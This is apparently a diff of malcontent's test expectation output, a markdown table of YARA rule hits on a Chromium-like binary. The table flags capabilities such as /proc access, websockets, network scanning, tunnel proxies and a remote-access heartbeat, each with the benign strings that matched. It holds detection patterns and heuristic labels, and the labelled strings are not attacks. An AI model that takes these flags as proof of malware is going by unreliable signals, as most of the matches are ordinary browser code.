[/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code)
[/tmp/perfetto-consumer](https://github.com/search?q=%2Ftmp%2Fperfetto-consumer&type=code)
[/tmp/perfetto-producer](https://github.com/search?q=%2Ftmp%2Fperfetto-producer&type=code) | +| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/chromium-upload-XXXXXXXXXXXXXXXX](https://github.com/search?q=%2Ftmp%2Fchromium-upload-XXXXXXXXXXXXXXXX&type=code)
[/tmp/perfetto-consumer](https://github.com/search?q=%2Ftmp%2Fperfetto-consumer&type=code)
[/tmp/perfetto-producer](https://github.com/search?q=%2Ftmp%2Fperfetto-producer&type=code)
[/tmp/node-repl-sock](https://github.com/search?q=%2Ftmp%2Fnode-repl-sock&type=code)
[/tmp/perf-%d.map](https://github.com/search?q=%2Ftmp%2Fperf-%25d.map&type=code)
[/tmp/__v8_gc__](https://github.com/search?q=%2Ftmp%2F__v8_gc__&type=code) | | MEDIUM | [fs/path/var_log](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var-log.yara#var_log_path) | path reference within /var/log | [/var/log/bluetooth/log.bz2.old](https://github.com/search?q=%2Fvar%2Flog%2Fbluetooth%2Flog.bz2.old&type=code) | | MEDIUM | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#Chown) | Changes file ownership | [Chown](https://github.com/search?q=Chown&type=code) | | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [Chmod](https://github.com/search?q=Chmod&type=code)
[chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/$](https://github.com/search?q=%2Fproc%2F%24&type=code)
[/proc/%d/task/](https://github.com/search?q=%2Fproc%2F%25d%2Ftask%2F&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/task/](https://github.com/search?q=%2Fproc%2F%25d%2Ftask%2F&type=code)
[/proc/$](https://github.com/search?q=%2Fproc%2F%24&type=code) | | MEDIUM | [fs/proc/cpuinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/cpuinfo.yara#proc_cpuinfo) | get CPU info | [/proc/cpuinfo](https://github.com/search?q=%2Fproc%2Fcpuinfo&type=code) | | MEDIUM | [fs/proc/meminfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/meminfo.yara#proc_meminfo_val) | get memory info | [/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code) | | MEDIUM | [fs/proc/self_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-cmdline.yara#proc_self_cmdline) | gets process command-line | [/proc/self/cmdline](https://github.com/search?q=%2Fproc%2Fself%2Fcmdline&type=code) | @@ -62,51 +62,51 @@ | MEDIUM | [fs/proc/self_status](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-status.yara#proc_self_status) | gets status associated to this process, including capabilities | [/proc/self/status](https://github.com/search?q=%2Fproc%2Fself%2Fstatus&type=code) | | MEDIUM | [fs/proc/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/stat.yara#proc_stat) | gets kernel/system statistics | [/proc/stat](https://github.com/search?q=%2Fproc%2Fstat&type=code) | | MEDIUM | [hw/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/cpu.yara#sys_devices_cpu) | Get information about CPUs | [/sys/devices/system/cpu](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fcpu&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [Failed to deserialized Heartbeat info pa](https://github.com/search?q=Failed+to+deserialized+Heartbeat+info+pa&type=code)
[Invalid heartbeat info:](https://github.com/search?q=Invalid+heartbeat+info%3A&type=code)
[No Heartbeat Info pa](https://github.com/search?q=No+Heartbeat+Info+pa&type=code)
[heartbeat:](https://github.com/search?q=heartbeat%3A&type=code)
[heartbeat_handler](https://github.com/search?q=heartbeat_handler&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [Failed to deserialized Heartbeat info pa](https://github.com/search?q=Failed+to+deserialized+Heartbeat+info+pa&type=code)
[Invalid heartbeat info:](https://github.com/search?q=Invalid+heartbeat+info%3A&type=code)
[No Heartbeat Info pa](https://github.com/search?q=No+Heartbeat+Info+pa&type=code)
[heartbeat_handler](https://github.com/search?q=heartbeat_handler&type=code)
[heartbeat:](https://github.com/search?q=heartbeat%3A&type=code) | | MEDIUM | [lateral/scan/target_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/target_ip.yara#target_ip) | References a target IP | [target IP](https://github.com/search?q=target+IP&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[connect](https://github.com/search?q=connect&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[probe](https://github.com/search?q=probe&type=code)
[Port](https://github.com/search?q=Port&type=code)
[port](https://github.com/search?q=port&type=code)
[scan](https://github.com/search?q=scan&type=code) | | MEDIUM | [malware/ref](https://github.com/chainguard-dev/malcontent/blob/main/rules/malware/ref.yara#malware) | mentions 'malware' | [_malware](https://github.com/search?q=_malware&type=code) | -| MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code)
[application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | +| MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code)
[DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | -| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [Accept](https://github.com/search?q=Accept&type=code)
[application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code) | +| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code)
[Accept](https://github.com/search?q=Accept&type=code) | | MEDIUM | [net/http/content_length](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | | MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code) | -| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[post](https://github.com/search?q=post&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type header.](https://github.com/search?q=Content-Type+header.&type=code)
[Content-Type: application/json](https://github.com/search?q=Content-Type%3A+application%2Fjson&type=code)
[Content-Type: application/octet](https://github.com/search?q=Content-Type%3A+application%2Foctet&type=code)
[Content-Type: multipart/form](https://github.com/search?q=Content-Type%3A+multipart%2Fform&type=code)
[Content-Type: multipart/related](https://github.com/search?q=Content-Type%3A+multipart%2Frelated&type=code)
[Content-Type: text/html](https://github.com/search?q=Content-Type%3A+text%2Fhtml&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[AcceptWebSocket](https://github.com/search?q=AcceptWebSocket&type=code)
[DOMWebSocket](https://github.com/search?q=DOMWebSocket&type=code)
[OnWebSocketMessage](https://github.com/search?q=OnWebSocketMessage&type=code)
[OnWebSocketRequest](https://github.com/search?q=OnWebSocketRequest&type=code)
[ServerSupportsWebSocket](https://github.com/search?q=ServerSupportsWebSocket&type=code)
[WebSocket::Close](https://github.com/search?q=WebSocket%3A%3AClose&type=code)
[WebSocket::Connect](https://github.com/search?q=WebSocket%3A%3AConnect&type=code)
[WebSocket::Create](https://github.com/search?q=WebSocket%3A%3ACreate&type=code)
[WebSocket::GetBufferedAmount](https://github.com/search?q=WebSocket%3A%3AGetBufferedAmount&type=code)
[WebSocket::GetCloseCode](https://github.com/search?q=WebSocket%3A%3AGetCloseCode&type=code)
[WebSocket::GetCloseReason](https://github.com/search?q=WebSocket%3A%3AGetCloseReason&type=code)
[WebSocket::GetCloseWasClean](https://github.com/search?q=WebSocket%3A%3AGetCloseWasClean&type=code)
[WebSocket::GetExtensions](https://github.com/search?q=WebSocket%3A%3AGetExtensions&type=code)
[WebSocket::GetProtocol](https://github.com/search?q=WebSocket%3A%3AGetProtocol&type=code)
[WebSocket::GetReadyState](https://github.com/search?q=WebSocket%3A%3AGetReadyState&type=code)
[WebSocket::GetURL](https://github.com/search?q=WebSocket%3A%3AGetURL&type=code)
[WebSocket::IsWebSocket](https://github.com/search?q=WebSocket%3A%3AIsWebSocket&type=code)
[WebSocket::ReceiveMessage](https://github.com/search?q=WebSocket%3A%3AReceiveMessage&type=code)
[WebSocket::SendMessage](https://github.com/search?q=WebSocket%3A%3ASendMessage&type=code)
[WebSocketAdapter](https://github.com/search?q=WebSocketAdapter&type=code)
[WebSocketAuthenticationHandler](https://github.com/search?q=WebSocketAuthenticationHandler&type=code)
[WebSocketChannelImpl](https://github.com/search?q=WebSocketChannelImpl&type=code)
[WebSocketClient](https://github.com/search?q=WebSocketClient&type=code)
[WebSocketCloseInfo](https://github.com/search?q=WebSocketCloseInfo&type=code)
[WebSocketConnector](https://github.com/search?q=WebSocketConnector&type=code)
[WebSocketCreate](https://github.com/search?q=WebSocketCreate&type=code)
[WebSocketDestroy](https://github.com/search?q=WebSocketDestroy&type=code)
[WebSocketHandshakeClient](https://github.com/search?q=WebSocketHandshakeClient&type=code)
[WebSocketMessageChunkAccumulator::Segment](https://github.com/search?q=WebSocketMessageChunkAccumulator%3A%3ASegment&type=code)
[WebSocketReassembleShortMessages](https://github.com/search?q=WebSocketReassembleShortMessages&type=code)
[WebSocketReceiveHandshakeResponse](https://github.com/search?q=WebSocketReceiveHandshakeResponse&type=code)
[WebSocketSendHandshakeRequest](https://github.com/search?q=WebSocketSendHandshakeRequest&type=code)
[WebSocketStream::Delegate::OnAuthRequired](https://github.com/search?q=WebSocketStream%3A%3ADelegate%3A%3AOnAuthRequired&type=code)
[WebSocketStreamOptions](https://github.com/search?q=WebSocketStreamOptions&type=code)
[WebSockets](https://github.com/search?q=WebSockets&type=code)
[testWebSocketPort](https://github.com/search?q=testWebSocketPort&type=code)
[webSocketClosed](https://github.com/search?q=webSocketClosed&type=code)
[webSocketCreated](https://github.com/search?q=webSocketCreated&type=code)
[webSocketDebuggerUrl](https://github.com/search?q=webSocketDebuggerUrl&type=code)
[webSocketFrameError](https://github.com/search?q=webSocketFrameError&type=code)
[webSocketFrameReceived](https://github.com/search?q=webSocketFrameReceived&type=code)
[webSocketFrameSent](https://github.com/search?q=webSocketFrameSent&type=code)
[webSocketHandshakeResponseReceived](https://github.com/search?q=webSocketHandshakeResponseReceived&type=code)
[webSocketProtocol](https://github.com/search?q=webSocketProtocol&type=code)
[webSocketWillSendHandshakeRequest](https://github.com/search?q=webSocketWillSendHandshakeRequest&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | $host_port
[host and port](https://github.com/search?q=host+and+port&type=code)
[host",t.port](https://github.com/search?q=host%22%2Ct.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+++origin_port&type=code)
[host, ctx.port](https://github.com/search?q=host%2C+ctx.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+origin_port&type=code)
[host, port](https://github.com/search?q=host%2C+port&type=code)
[host,r.port=e.port](https://github.com/search?q=host%2Cr.port%3De.port&type=code)
[host.length - port](https://github.com/search?q=host.length+-+port&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:]port](https://github.com/search?q=host%3A%5Dport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code)
[host=null,this.port](https://github.com/search?q=host%3Dnull%2Cthis.port&type=code)
[host>:[host_import](https://github.com/search?q=host_import&type=code)
[hostname and port](https://github.com/search?q=hostname+and+port&type=code)
[hostname, port](https://github.com/search?q=hostname%2C+port&type=code)
[hostname="",r.port](https://github.com/search?q=hostname%3D%22%22%2Cr.port&type=code)
[hostname=null,e.port](https://github.com/search?q=hostname%3Dnull%2Ce.port&type=code)
[host}${port](https://github.com/search?q=host%7D%24%7Bport&type=code)
[host}:${port](https://github.com/search?q=host%7D%3A%24%7Bport&type=code) | -| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping err](https://github.com/search?q=ping++err&type=code)
[ping cancelled](https://github.com/search?q=ping+cancelled&type=code)
[ping connectivity probe](https://github.com/search?q=ping+connectivity+probe&type=code)
[ping failures and](https://github.com/search?q=ping+failures+and&type=code)
[ping from zygote child](https://github.com/search?q=ping+from+zygote+child&type=code)
[ping interval to](https://github.com/search?q=ping+interval+to&type=code)
[ping interval.](https://github.com/search?q=ping+interval.&type=code)
[ping last_ping_sent_:](https://github.com/search?q=ping+last_ping_sent_%3A&type=code)
[ping libuv](https://github.com/search?q=ping+libuv&type=code)
[ping most likely connection to](https://github.com/search?q=ping+most+likely+connection+to&type=code)
[ping payload must be 8 bytes](https://github.com/search?q=ping+payload+must+be+8+bytes&type=code)
[ping received](https://github.com/search?q=ping+received&type=code)
[ping response](https://github.com/search?q=ping+response&type=code)
[ping was sent and the ack](https://github.com/search?q=ping+was+sent+and+the+ack&type=code)
[ping with high retransmit count:](https://github.com/search?q=ping+with+high+retransmit+count%3A&type=code) | +| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits form content to websites | [Content-Type: application/octet](https://github.com/search?q=Content-Type%3A+application%2Foctet&type=code)
[Content-Type: multipart/related](https://github.com/search?q=Content-Type%3A+multipart%2Frelated&type=code)
[Content-Type: application/json](https://github.com/search?q=Content-Type%3A+application%2Fjson&type=code)
[Content-Type: multipart/form](https://github.com/search?q=Content-Type%3A+multipart%2Fform&type=code)
[Content-Type: text/plain](https://github.com/search?q=Content-Type%3A+text%2Fplain&type=code)
[Content-Type: text/html](https://github.com/search?q=Content-Type%3A+text%2Fhtml&type=code)
[Content-Type header.](https://github.com/search?q=Content-Type+header.&type=code)
[Content-Typeding](https://github.com/search?q=Content-Typeding&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocketMessageChunkAccumulator::Segment](https://github.com/search?q=WebSocketMessageChunkAccumulator%3A%3ASegment&type=code)
[WebSocketStream::Delegate::OnAuthRequired](https://github.com/search?q=WebSocketStream%3A%3ADelegate%3A%3AOnAuthRequired&type=code)
[258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[webSocketHandshakeResponseReceived](https://github.com/search?q=webSocketHandshakeResponseReceived&type=code)
[WebSocketReceiveHandshakeResponse](https://github.com/search?q=WebSocketReceiveHandshakeResponse&type=code)
[webSocketWillSendHandshakeRequest](https://github.com/search?q=webSocketWillSendHandshakeRequest&type=code)
[WebSocketReassembleShortMessages](https://github.com/search?q=WebSocketReassembleShortMessages&type=code)
[WebSocketAuthenticationHandler](https://github.com/search?q=WebSocketAuthenticationHandler&type=code)
[WebSocketSendHandshakeRequest](https://github.com/search?q=WebSocketSendHandshakeRequest&type=code)
[WebSocket::GetBufferedAmount](https://github.com/search?q=WebSocket%3A%3AGetBufferedAmount&type=code)
[WebSocket::GetCloseWasClean](https://github.com/search?q=WebSocket%3A%3AGetCloseWasClean&type=code)
[WebSocket::GetCloseReason](https://github.com/search?q=WebSocket%3A%3AGetCloseReason&type=code)
[WebSocket::ReceiveMessage](https://github.com/search?q=WebSocket%3A%3AReceiveMessage&type=code)
[WebSocket::GetExtensions](https://github.com/search?q=WebSocket%3A%3AGetExtensions&type=code)
[WebSocket::GetReadyState](https://github.com/search?q=WebSocket%3A%3AGetReadyState&type=code)
[WebSocketHandshakeClient](https://github.com/search?q=WebSocketHandshakeClient&type=code)
[ServerSupportsWebSocket](https://github.com/search?q=ServerSupportsWebSocket&type=code)
[WebSocket::GetCloseCode](https://github.com/search?q=WebSocket%3A%3AGetCloseCode&type=code)
[WebSocket::GetProtocol](https://github.com/search?q=WebSocket%3A%3AGetProtocol&type=code)
[WebSocket::IsWebSocket](https://github.com/search?q=WebSocket%3A%3AIsWebSocket&type=code)
[WebSocket::SendMessage](https://github.com/search?q=WebSocket%3A%3ASendMessage&type=code)
[WebSocketStreamOptions](https://github.com/search?q=WebSocketStreamOptions&type=code)
[webSocketFrameReceived](https://github.com/search?q=webSocketFrameReceived&type=code)
[WebSocketChannelImpl](https://github.com/search?q=WebSocketChannelImpl&type=code)
[webSocketDebuggerUrl](https://github.com/search?q=webSocketDebuggerUrl&type=code)
[webSocketFrameError](https://github.com/search?q=webSocketFrameError&type=code)
[OnWebSocketMessage](https://github.com/search?q=OnWebSocketMessage&type=code)
[OnWebSocketRequest](https://github.com/search?q=OnWebSocketRequest&type=code)
[WebSocket::Connect](https://github.com/search?q=WebSocket%3A%3AConnect&type=code)
[WebSocketCloseInfo](https://github.com/search?q=WebSocketCloseInfo&type=code)
[WebSocketConnector](https://github.com/search?q=WebSocketConnector&type=code)
[webSocketFrameSent](https://github.com/search?q=webSocketFrameSent&type=code)
[WebSocket::Create](https://github.com/search?q=WebSocket%3A%3ACreate&type=code)
[WebSocket::GetURL](https://github.com/search?q=WebSocket%3A%3AGetURL&type=code)
[testWebSocketPort](https://github.com/search?q=testWebSocketPort&type=code)
[webSocketProtocol](https://github.com/search?q=webSocketProtocol&type=code)
[WebSocket::Close](https://github.com/search?q=WebSocket%3A%3AClose&type=code)
[WebSocketAdapter](https://github.com/search?q=WebSocketAdapter&type=code)
[WebSocketDestroy](https://github.com/search?q=WebSocketDestroy&type=code)
[webSocketCreated](https://github.com/search?q=webSocketCreated&type=code)
[AcceptWebSocket](https://github.com/search?q=AcceptWebSocket&type=code)
[WebSocketClient](https://github.com/search?q=WebSocketClient&type=code)
[WebSocketCreate](https://github.com/search?q=WebSocketCreate&type=code)
[webSocketClosed](https://github.com/search?q=webSocketClosed&type=code)
[DOMWebSocket](https://github.com/search?q=DOMWebSocket&type=code)
[WebSockets](https://github.com/search?q=WebSockets&type=code) | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [hostname=null,e.port](https://github.com/search?q=hostname%3Dnull%2Ce.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+++origin_port&type=code)
[host=null,this.port](https://github.com/search?q=host%3Dnull%2Cthis.port&type=code)
[host,r.port=e.port](https://github.com/search?q=host%2Cr.port%3De.port&type=code)
[host.length - port](https://github.com/search?q=host.length+-+port&type=code)
[hostname="",r.port](https://github.com/search?q=hostname%3D%22%22%2Cr.port&type=code)
[host, origin_port](https://github.com/search?q=host%2C+origin_port&type=code)
[hostname and port](https://github.com/search?q=hostname+and+port&type=code)
[host, ctx.port](https://github.com/search?q=host%2C+ctx.port&type=code)
[hostname, port](https://github.com/search?q=hostname%2C+port&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host",t.port](https://github.com/search?q=host%22%2Ct.port&type=code)
[host}:${port](https://github.com/search?q=host%7D%3A%24%7Bport&type=code)
[host>:[host_import](https://github.com/search?q=host_import&type=code)
[host}${port](https://github.com/search?q=host%7D%24%7Bport&type=code)
[host, port](https://github.com/search?q=host%2C+port&type=code)
[host:]port](https://github.com/search?q=host%3A%5Dport&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code)
[host_port](https://github.com/search?q=host_port&type=code) | +| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping with high retransmit count:](https://github.com/search?q=ping+with+high+retransmit+count%3A&type=code)
[ping most likely connection to](https://github.com/search?q=ping+most+likely+connection+to&type=code)
[ping payload must be 8 bytes](https://github.com/search?q=ping+payload+must+be+8+bytes&type=code)
[ping was sent and the ack](https://github.com/search?q=ping+was+sent+and+the+ack&type=code)
[ping connectivity probe](https://github.com/search?q=ping+connectivity+probe&type=code)
[ping from zygote child](https://github.com/search?q=ping+from+zygote+child&type=code)
[ping last_ping_sent_:](https://github.com/search?q=ping+last_ping_sent_%3A&type=code)
[ping failures and](https://github.com/search?q=ping+failures+and&type=code)
[ping interval to](https://github.com/search?q=ping+interval+to&type=code)
[ping cancelled](https://github.com/search?q=ping+cancelled&type=code)
[ping interval.](https://github.com/search?q=ping+interval.&type=code)
[ping received](https://github.com/search?q=ping+received&type=code)
[ping response](https://github.com/search?q=ping+response&type=code)
[ping libuv](https://github.com/search?q=ping+libuv&type=code)
[ping err](https://github.com/search?q=ping++err&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | | MEDIUM | [net/proxy/socks5](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/socks5.yara#socks5) | Supports SOCK5 proxies | [CONNECT %s](https://github.com/search?q=CONNECT+%25s&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[Tunnel](https://github.com/search?q=Tunnel&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[Tunnel](https://github.com/search?q=Tunnel&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code)
[Proxy](https://github.com/search?q=Proxy&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[proxy](https://github.com/search?q=proxy&type=code) | | MEDIUM | [net/rpc/ntlm](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/rpc/ntlm.yara#windows_ntlm_auth) | supports Windows NTLM authentication | [ntlm](https://github.com/search?q=ntlm&type=code) | | MEDIUM | [net/socket/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-connect.yara#_connect) | [initiate a connection on a socket](https://linux.die.net/man/3/connect) | [_connect](https://github.com/search?q=_connect&type=code) | | MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | | MEDIUM | [net/socket/pair](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/pair.yara#socket_pair) | create a pair of connected sockets | [socketpair](https://github.com/search?q=socketpair&type=code) | | MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | | MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Supports SSH (secure shell) | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url_with_php) | contains hardcoded PHP endpoint | [-//WcardshillsteamsPhototruthclean.php?saintmetallouismeantproofbriefro](https://github.com/search?q=-%2F%2FWcardshillsteamsPhototruthclean.php%3Fsaintmetallouismeantproofbriefro&type=code)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code)
[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true](http://autocomplete.nigma.ru/complete/query_help.php?suggest=true)
[http://search.incredibar.com/search.php?q=](http://search.incredibar.com/search.php?q=)
[http://searchfunmoods.com/results.php?q=](http://searchfunmoods.com/results.php?q=)
[https://m.so.com/index.php?ie=](https://m.so.com/index.php?ie=)
[https://search.privacywall.org/suggest.php?q=](https://search.privacywall.org/suggest.php?q=)
